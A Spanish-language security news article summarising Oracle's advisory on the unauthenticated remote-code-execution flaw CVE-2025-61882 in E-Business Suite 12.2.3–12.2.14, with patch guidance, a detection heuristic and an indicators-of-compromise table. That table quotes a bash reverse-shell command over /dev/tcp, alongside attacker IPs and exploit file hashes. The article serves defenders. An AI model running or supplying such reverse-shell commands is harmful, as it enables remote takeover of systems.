Red Hot Cyber
La ciberseguridad se comparte. Reconozca el riesgo, combátalo, comparta sus experiencias y anime a otros a hacerlo mejor que usted.
Buscar
2nd Edition GlitchZone RHC 320x100 2
LECS 970x120 1
Vulnerabilidad de Oracle E-Business Suite 9.8: se necesitan actualizaciones urgentes

Vulnerabilidad de Oracle E-Business Suite 9.8: se necesitan actualizaciones urgentes

Redazione RHC : 5 octubre 2025 21:29

Oracle ha publicado un aviso de seguridad sobre una vulnerabilidad crítica identificada como CVE-2025-61882 en Oracle E-Business Suite . Esta falla puede explotarse remotamente sin autenticación , lo que podría permitir la ejecución de código malicioso en los sistemas afectados.

La compañía recomienda a sus clientes que apliquen de inmediato las actualizaciones descritas en el aviso. Oracle enfatiza la importancia de mantener las versiones de producto con soporte activo e instalar todos los parches de seguridad críticos con prontitud. En particular, la actualización de los parches críticos publicados en octubre de 2023 es un requisito previo para implementar nuevas correcciones.

Para respaldar la detección y contención inmediata de posibles ataques, la alerta incluye una matriz de riesgo con indicadores de compromiso , como direcciones IP sospechosas, comandos y archivos asociados con exploits conocidos.

Productos afectados y parches disponibles

La vulnerabilidad afecta específicamente a las versiones 12.2.3 a 12.2.14 de Oracle E-Business Suite . La documentación oficial, disponible a través de los enlaces proporcionados por Oracle, contiene información detallada sobre los parches y su instalación.

productos y versiones afectados Documento de disponibilidad de parches
Oracle E-Business Suite, versiones 12.2.3–12.2.14 Suite de negocios electrónicos de Oracle

Soporte y versiones heredadas

Los parches proporcionados a través del programa de alerta de seguridad solo están disponibles para las versiones cubiertas por Soporte Premier o Soporte Extendido según la Política de Soporte de por Vida de Oracle.

Las versiones no incluidas en estos programas no se someten a pruebas para detectar las vulnerabilidades reportadas, aunque aún puedan verse afectadas. Por este motivo, Oracle recomienda actualizar a versiones compatibles para garantizar la protección y la compatibilidad con los parches de seguridad.

Cómo comprobar si estás afectado por el error

CVE-2025-61882 afecta a Oracle E-Business Suite y se puede explotar de forma remota sin autenticación, lo que podría provocar la ejecución remota de código si se explota con éxito.

Se ha publicado en GitHub un método de detección público que ayuda a identificar instancias potencialmente obsoletas. El método marca una instancia como sospechosa cuando la página devuelve la cadena «Página de inicio de E-Business Suite» y el encabezado HTTP » Última modificación » indica una fecha anterior al 4 de octubre de 2025 (marca de tiempo Unix 1759602752 ).

Este enfoque se describe como una herramienta de detección, no como un vector de ataque , y debe utilizarse únicamente con fines de verificación y defensa. Para mitigar el riesgo, Oracle recomienda aplicar los parches descritos en el aviso de seguridad y actualizar a las versiones compatibles.

Indicadores de Compromiso (IOC)

A continuación se muestran indicadores de compromiso (direcciones IP, comandos observados y archivos) para respaldar la detección, investigación y contención inmediatas.

Indicador Tipo Descripción
200[.]107[.]207[.]26 Propiedad intelectual Actividad potencial GET y POST
185[.]181[.]60[.]11 Propiedad intelectual Actividad potencial GET y POST
sh -c /bin/bash -i >& /dev/tcp//0>&1 Dominio Establecer una conexión TCP saliente en un puerto específico
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d SHA 256 oráculo_ebs_nday_exploit_poc_dispersos_lapsus_retard_cl0p_hunters.zip
aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 SHA 256 oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py
6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b SHA 256 oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py

Immagine del sitoRedazione
Red Hot Cyber's editorial team consists of a collection of individuals and anonymous sources who actively collaborate by providing advance information and news on cyber security and IT in general.

Lista degli articoli

Artículos destacados

Immagine del sito
Gemini 3.0 Pro: Google se prepara para el salto generacional y pretende superar a GPT-5 y Claude 4.5
Di Redazione RHC - 25/10/2025

En los últimos días, algunos usuarios han recibido una notificación diciendo que sus dispositivos Gemini Advanced han sido «actualizados del modelo de la generación anterior al 3.0 Pro, el modelo...

Immagine del sito
Explosión crítica de RCE en Microsoft WSUS explotada activamente. CISA advierte: riesgo inminente.
Di Redazione RHC - 25/10/2025

La Agencia de Seguridad de Infraestructura y Ciberseguridad de Estados Unidos (CISA) ha emitido una alerta global con respecto a la explotación activa de una falla crítica de ejecución remota de c�...

Immagine del sito
¡Sin carne ni huesos, solo código! Llega el primer presentador de IA de Channel 4.
Di Redazione RHC - 24/10/2025

El lunes 20 de octubre, el Canal 4 transmitió un documental completo presentado por un presentador de televisión creativo impulsado completamente por inteligencia artificial. » No soy real. Por pri...

Immagine del sito
Rusia y el cibercrimen: un equilibrio entre la represión selectiva y el interés estatal
Di Ada Spinelli - 24/10/2025

El ecosistema ruso del cibercrimen ha entrado en una fase de profunda transformación, provocada por una combinación de factores: una presión internacional sin precedentes por parte de los organismo...

Immagine del sito
Hackean la web de la FIA: datos personales de Max Verstappen y más de 7.000 pilotos expuestos
Di Redazione RHC - 24/10/2025

Investigadores de seguridad han descubierto vulnerabilidades en un sitio web de la FIA que contenía información personal confidencial y documentos relacionados con los pilotos, incluido el campeón ...